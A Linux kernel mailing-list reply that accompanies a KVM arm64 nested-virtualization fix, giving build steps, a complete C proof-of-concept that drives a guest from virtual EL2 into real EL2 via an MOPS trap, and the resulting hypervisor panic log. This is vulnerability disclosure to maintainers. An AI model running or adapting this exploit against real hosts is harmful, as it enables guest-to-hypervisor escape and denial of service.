Linux-ARM-Kernel Archive on lore.kernel.org
 help / color / mirror / Atom feed
From: Weiming Shi <bestswngs@gmail.com>
To: Marc Zyngier <maz@kernel.org>, Oliver Upton <oupton@kernel.org>,
	 Catalin Marinas <catalin.marinas@arm.com>,
	Will Deacon <will@kernel.org>
Cc: Joey Gouly <joey.gouly@arm.com>,
	Steffen Eiden <seiden@linux.ibm.com>,
	 Suzuki K Poulose <suzuki.poulose@arm.com>,
	Zenghui Yu <yuzenghui@huawei.com>,
	 Andrew Morton <akpm@linux-foundation.org>,
	Jakub Kicinski <kuba@kernel.org>,
	 Bjorn Andersson <andersson@kernel.org>,
	Mark Rutland <mark.rutland@arm.com>,
	 Kristina Martsenko <kristina.martsenko@arm.com>,
	linux-arm-kernel@lists.infradead.org, kvmarm@lists.linux.dev,
	 Zhong Wang <wangzhong.c0ss4ck@bytedance.com>,
	Xuanqing Shi <shixuanqing.11@bytedance.com>
Subject: Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
Date: Tue, 16 Jun 2026 20:03:55 +0800	[thread overview]
Message-ID: <ajE4lHQevXNHpl1M@Air.local> (raw)
In-Reply-To: <20260616114943.81188-2-bestswngs@gmail.com>



Reproduction Steps:

1. prepare arm64 kernel image

```
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig
./scripts/config -e VIRTUALIZATION -e KVM
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j$(nproc) Image
make ARCH=arm64 headers_install INSTALL_HDR_PATH=/tmp/khdr
```
2. prepare qemu + initramfs

3. boot qemu with the kernel iamge

```
qemu-system-aarch64 \
    -machine virt,virtualization=on,gic-version=3 -cpu max -accel tcg \
    -smp 2 -m 2G -kernel arch/arm64/boot/Image -initrd initramfs.cpio.gz \
    -append "console=ttyAMA0 kvm-arm.mode=nested rdinit=/init panic=-1 oops=panic" \
    -nographic -no-reboot
```

PoC:

```
/*
* PoC: kvm_hyp_handle_mops SPSR_EL2 privilege escalation (EL1 -> EL2)
*
* Demonstrates that kvm_hyp_handle_mops writes un-translated PSR_MODE_EL2h
* into hardware SPSR_EL2 on the fast-reentry path, allowing a nested guest
* to escape to real EL2 after an EC_MOPS trap.
*
* Build:  aarch64-linux-gnu-gcc -static -O0 -o poc_mops poc_mops_clean.c
* Run:    sudo ./poc_mops
*
* Expected result on vulnerable kernel: HYP panic with PS:00000009 (EL2h)
*/


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>
#include <linux/kvm.h>


#define KVM_ARM_VCPU_HAS_EL2  7


#define PSR_MODE_EL1h  0x00000005
#define PSR_MODE_EL2h  0x00000009


#define ARM64_CORE_REG(u32_off) (0x6030000000100000ULL | (uint64_t)(u32_off))
#define REG_X(n)    ARM64_CORE_REG((n) * 2)
#define REG_SP      ARM64_CORE_REG(62)
#define REG_PC      ARM64_CORE_REG(64)
#define REG_PSTATE  ARM64_CORE_REG(66)


#define GUEST_MEM_SIZE   (64 * 1024 * 1024)
#define GUEST_CODE_ADDR  0x40000000ULL
#define GUEST_STACK_TOP  (GUEST_CODE_ADDR + GUEST_MEM_SIZE - 0x1000)
#define MMIO_ADDR        0x10000000ULL


static int kvm_set_one_reg(int fd, uint64_t id, uint64_t val)
{
   struct kvm_one_reg r = { .id = id, .addr = (uint64_t)&val };
   return ioctl(fd, KVM_SET_ONE_REG, &r);
}


static int kvm_get_one_reg(int fd, uint64_t id, uint64_t *val)
{
   struct kvm_one_reg r = { .id = id, .addr = (uint64_t)val };
   return ioctl(fd, KVM_GET_ONE_REG, &r);
}


static void die(const char *msg) { perror(msg); exit(1); }


/*
* Guest code (runs at virtual EL2h).
*
* Triggers EC_MOPS by executing CPYP (prologue, large size so it doesn't
* complete in prologue phase) followed immediately by CPYE (epilogue).
* The CPU detects PSTATE.MOPS_STATE mismatch and traps.
*
* kvm_hyp_handle_mops resets PC -= 8 (for epilogue) and writes vcpu_cpsr
* (which contains EL2h after fixup_guest_exit reverse translation) directly
* to HW SPSR_EL2 without forward translation. On eret, the CPU enters
* real EL2h at the guest PC, causing an instruction abort (no EL2 mapping
* for guest addresses) -> HYP panic.
*
* Layout (offsets from GUEST_CODE_ADDR):
*   +0x00  setup x0,x1,x2,x3
*   +0x10  movz x9, #0
*   +0x14  mrs x10, CurrentEL         ; record EL before
*   +0x18  str x10, [x3]              ; MMIO exit #1
*   +0x1C  b +16                      ; jump to cpyp at +0x2C
*   +0x20  nop
*   +0x24  nop
*   +0x28  mrs x11, CurrentEL         ; <-- RESET LANDS HERE (0x30-8)
*   +0x2C  cpyp [x0]!, [x1]!, x2!
*   +0x30  cpye [x0]!, [x1]!, x2!    ; EC_MOPS trap
*   +0x34  str x11, [x3]              ; MMIO exit #2 (after 2nd pass)
*   +0x38  b .                        ; done
*/
static const uint32_t guest_code[] = {
   0xd2a80200,  /* +0x00  movz x0, #0x4010, lsl #16  (dest = 0x40100000) */
   0xd2a80401,  /* +0x04  movz x1, #0x4020, lsl #16  (src  = 0x40200000) */
   0xd2a00202,  /* +0x08  movz x2, #0x10, lsl #16    (size = 1MB) */
   0xd2a20003,  /* +0x0C  movz x3, #0x1000, lsl #16  (MMIO = 0x10000000) */
   0xd2800009,  /* +0x10  movz x9, #0 */
   0xd538424a,  /* +0x14  mrs x10, CurrentEL */
   0xf900006a,  /* +0x18  str x10, [x3] */
   0x14000004,  /* +0x1C  b +16 -> +0x2C */
   0xd503201f,  /* +0x20  nop */
   0xd503201f,  /* +0x24  nop */
   0xd538424b,  /* +0x28  mrs x11, CurrentEL (AFTER eret) */
   0x1d010440,  /* +0x2C  cpyp [x0]!, [x1]!, x2! */
   0x1d810440,  /* +0x30  cpye [x0]!, [x1]!, x2! -> EC_MOPS */
   0xf900006b,  /* +0x34  str x11, [x3] */
   0x14000000,  /* +0x38  b . */
};


int main(void)
{
   int kvm_fd, vm_fd, vcpu_fd, ret;
   struct kvm_vcpu_init vcpu_init = {};
   struct kvm_run *run;
   void *guest_mem;


   setbuf(stdout, NULL);
   setbuf(stderr, NULL);


   printf("[*] kvm_hyp_handle_mops SPSR privilege escalation PoC\n");
   printf("[*] Target: Linux kernel with CONFIG_KVM_ARM_NV + FEAT_MOPS\n\n");


   kvm_fd = open("/dev/kvm", O_RDWR);
   if (kvm_fd < 0) die("open /dev/kvm");


   vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
   if (vm_fd < 0) die("KVM_CREATE_VM");


   /* Guest memory */
   guest_mem = mmap(NULL, GUEST_MEM_SIZE, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (guest_mem == MAP_FAILED) die("mmap");


   struct kvm_userspace_memory_region region = {
       .slot = 0,
       .guest_phys_addr = GUEST_CODE_ADDR,
       .memory_size = GUEST_MEM_SIZE,
       .userspace_addr = (uint64_t)guest_mem,
   };
   if (ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, &region) < 0)
       die("KVM_SET_USER_MEMORY_REGION");


   memcpy(guest_mem, guest_code, sizeof(guest_code));


   /* Create vCPU with nested virtualization */
   vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
   if (vcpu_fd < 0) die("KVM_CREATE_VCPU");


   if (ioctl(vm_fd, KVM_ARM_PREFERRED_TARGET, &vcpu_init) < 0)
       die("KVM_ARM_PREFERRED_TARGET");


   vcpu_init.features[0] |= (1 << KVM_ARM_VCPU_HAS_EL2);
   if (ioctl(vcpu_fd, KVM_ARM_VCPU_INIT, &vcpu_init) < 0) {
       perror("KVM_ARM_VCPU_INIT with HAS_EL2");
       printf("[-] Nested virtualization not supported.\n");
       return 1;
   }
   printf("[+] vCPU created with nested virt (NV)\n");


   /* GICv3 (required before KVM_RUN) */
   {
       struct kvm_create_device gic_dev = { .type = KVM_DEV_TYPE_ARM_VGIC_V3 };
       if (ioctl(vm_fd, KVM_CREATE_DEVICE, &gic_dev) < 0)
           die("KVM_CREATE_DEVICE GICv3");


       uint64_t dist = 0x08000000ULL, redist = 0x080A0000ULL;
       struct kvm_device_attr attr = {
           .group = KVM_DEV_ARM_VGIC_GRP_ADDR,
           .attr = KVM_VGIC_V3_ADDR_TYPE_DIST,
           .addr = (uint64_t)&dist,
       };
       ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
       attr.attr = KVM_VGIC_V3_ADDR_TYPE_REDIST;
       attr.addr = (uint64_t)&redist;
       ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);


       attr = (struct kvm_device_attr){
           .group = KVM_DEV_ARM_VGIC_GRP_CTRL,
           .attr = KVM_DEV_ARM_VGIC_CTRL_INIT,
       };
       ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
       printf("[+] GICv3 initialized\n");
   }


   /* Set vCPU state: start at virtual EL2h */
   kvm_set_one_reg(vcpu_fd, REG_PC, GUEST_CODE_ADDR);
   kvm_set_one_reg(vcpu_fd, REG_SP, GUEST_STACK_TOP);
   if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL2h) < 0) {
       printf("[!] Cannot set EL2h, falling back to EL1h\n");
       kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL1h);
   }
   printf("[+] vCPU: PC=0x%llx PSTATE=EL2h SP=0x%llx\n",
          (unsigned long long)GUEST_CODE_ADDR,
          (unsigned long long)GUEST_STACK_TOP);


   /* Map kvm_run */
   int run_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
   run = mmap(NULL, run_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpu_fd, 0);
   if (run == MAP_FAILED) die("mmap vcpu");


   /* Execute guest */
   printf("\n[*] Running guest. If kernel panics -> vulnerability confirmed.\n\n");


   int mmio_count = 0;
   uint64_t el_before = 0, el_after = 0;


   for (int i = 0; i < 100; i++) {
       ret = ioctl(vcpu_fd, KVM_RUN, 0);
       if (ret < 0) {
           printf("[-] KVM_RUN failed: %s (errno=%d)\n", strerror(errno), errno);
           break;
       }


       switch (run->exit_reason) {
       case KVM_EXIT_MMIO:
           if (run->mmio.is_write && run->mmio.phys_addr == MMIO_ADDR) {
               uint64_t val = 0;
               memcpy(&val, run->mmio.data, run->mmio.len);
               mmio_count++;
               printf("[+] MMIO #%d: CurrentEL = 0x%llx (EL%lld)\n",
                      mmio_count, (unsigned long long)val, (long long)(val >> 2) & 3);
               if (mmio_count == 1) el_before = (val >> 2) & 3;
               if (mmio_count == 2) { el_after = (val >> 2) & 3; goto results; }
           }
           break;


       case KVM_EXIT_INTERNAL_ERROR:
           printf("[!] INTERNAL_ERROR: safety assert may have caught EL2h SPSR\n");
           goto done;


       case KVM_EXIT_FAIL_ENTRY:
           printf("[-] FAIL_ENTRY: 0x%llx\n",
                  (unsigned long long)run->fail_entry.hardware_entry_failure_reason);
           goto done;


       default:
           printf("[*] exit_reason=%d (iter %d)\n", run->exit_reason, i);
           break;
       }
   }
   printf("[-] Max iterations reached without result.\n");
   goto done;


results:
   printf("\n========== RESULTS ==========\n");
   printf("  EL before MOPS: EL%lld\n", (long long)el_before);
   printf("  EL after  MOPS: EL%lld\n", (long long)el_after);
   printf("=============================\n\n");


   if (el_after > el_before)
       printf("[!!!] PRIVILEGE ESCALATION: EL%lld -> EL%lld\n",
              (long long)el_before, (long long)el_after);
   else
       printf("[+] No escalation observed in guest registers.\n");


done:
   printf("\n[*] Check dmesg for HYP panic:\n");
   printf("    dmesg | grep -i 'hyp panic\\|PS:.*0009'\n");
   printf("[*] If PS:00000009 appears -> SPSR contained EL2h -> vuln confirmed.\n");


   close(vcpu_fd);
   close(vm_fd);
   close(kvm_fd);
   munmap(guest_mem, GUEST_MEM_SIZE);
   munmap(run, run_size);
   return 0;
}

```

crash log

```
========== FatalMOPS dynamic test (L1 host) ==========
  [*] CPU ID registers (FEAT_MOPS bits[19:16] of isar2; FEAT_NV bits[27:24] of mmfr2):
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64isar2_el1: (absent)
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64mmfr2_el1: (absent)
  [+] /dev/kvm present
  [*] dmesg nested-virt lines:
  [*] launching /poc ...
  [*] FatalMOPS PoC: kvm_hyp_handle_mops vEL2->EL2 escape
  [+] vCPU created with nested virt (HAS_EL2)
  [+] GICv3 initialized
  [+] vCPU starts at virtual EL2h
  [*] Running guest. Vulnerable kernel -> HYP panic expected.
  [+] MMIO #1: CurrentEL=EL2
  [    3.326956] Kernel panic - not syncing: HYP panic:
  [    3.326956] PS:00000009 PC:0000000040000028 ESR:86000005
  [    3.326956] FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  [    3.326956] VCPU:000000006f4e5727
  [    3.342728] CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  [    3.349460] Hardware name: linux,dummy-virt (DT)
  [    3.353136] Call trace:
  [    3.355241]  show_stack+0x18/0x24 (C)
  [    3.358652]  dump_stack_lvl+0x34/0x8c
  [    3.361515]  dump_stack+0x18/0x24
  [    3.364085]  vpanic+0x47c/0x4dc
  [    3.366527]  do_panic_on_target_cpu+0x0/0x1c
  [    3.369782]  kvm_unexpected_el2_exception+0x0/0x3c0
  [    3.373494]  hyp_panic+0x0/0x80
  [    3.375940]  kvm_arm_vcpu_enter_exit+0x64/0x94
  [    3.379372]  kvm_arch_vcpu_ioctl_run+0x27c/0x8f8
  [    3.382919]  kvm_vcpu_ioctl+0x174/0xa38
  [    3.385894]  __arm64_sys_ioctl+0xac/0x104
  [    3.389105]  invoke_syscall+0x54/0x10c
  [    3.392015]  el0_svc_common.constprop.0+0x40/0xe0
  [    3.395653]  do_el0_svc+0x1c/0x28
  [    3.398236]  el0_svc+0x38/0x11c
  [    3.400681]  el0t_64_sync_handler+0xa0/0xe4
  [    3.403872]  el0t_64_sync+0x198/0x19c
  [    3.407083] SMP: stopping secondary CPUs
  [    3.410661] Kernel Offset: 0x127592c00000 from 0xffff800080000000
  [    3.415585] PHYS_OFFSET: 0x40000000
  [    3.418668] CPU features: 0x00000000,0034e00b,ffeec7e1,9d7e7f3f
  [    3.423170] Memory Limit: none
```

after decode

```
  Kernel panic - not syncing: HYP panic:
  PS:00000009 PC:0000000040000028 ESR:86000005
  FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  VCPU:000000006f4e5727
  CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  Call trace:
   show_stack                   (arch/arm64/kernel/stacktrace.c:499)
   dump_stack_lvl               (lib/dump_stack.c:94 120)
   dump_stack                   (lib/dump_stack.c:129)
   vpanic                       (kernel/panic.c:650)
   do_panic_on_target_cpu       (kernel/panic.c:341)
   kvm_unexpected_el2_exception (arch/arm64/kvm/hyp/include/hyp/switch.h:964
                                 → arch/arm64/kvm/hyp/vhe/switch.c:688)
   hyp_panic                    (arch/arm64/kvm/hyp/vhe/switch.c:678)
   kvm_arm_vcpu_enter_exit      (arch/arm64/kvm/arm.c:1227)
   kvm_arch_vcpu_ioctl_run      (arch/arm64/kvm/arm.c:1324)
   kvm_vcpu_ioctl               (virt/kvm/kvm_main.c:4470)
   __arm64_sys_ioctl            (fs/ioctl.c:51 597 583)
   invoke_syscall               (arch/arm64/kernel/syscall.c:35 49)
   el0_svc_common.constprop.0   (arch/arm64/kernel/syscall.c:121)
   do_el0_svc                   (arch/arm64/kernel/syscall.c:140)
   el0_svc                      (arch/arm64/kernel/entry-common.c:740)
   el0t_64_sync_handler         (arch/arm64/kernel/entry-common.c:759)
   el0t_64_sync                 (arch/arm64/kernel/entry.S:594)
```




      reply	other threads:[~2026-06-16 12:04 UTC|newest]

Thread overview: 2+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
2026-06-16 12:03 ` Weiming Shi [this message]

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=ajE4lHQevXNHpl1M@Air.local \
    --to=bestswngs@gmail.com \
    --cc=akpm@linux-foundation.org \
    --cc=andersson@kernel.org \
    --cc=catalin.marinas@arm.com \
    --cc=joey.gouly@arm.com \
    --cc=kristina.martsenko@arm.com \
    --cc=kuba@kernel.org \
    --cc=kvmarm@lists.linux.dev \
    --cc=linux-arm-kernel@lists.infradead.org \
    --cc=mark.rutland@arm.com \
    --cc=maz@kernel.org \
    --cc=oupton@kernel.org \
    --cc=seiden@linux.ibm.com \
    --cc=shixuanqing.11@bytedance.com \
    --cc=suzuki.poulose@arm.com \
    --cc=wangzhong.c0ss4ck@bytedance.com \
    --cc=will@kernel.org \
    --cc=yuzenghui@huawei.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox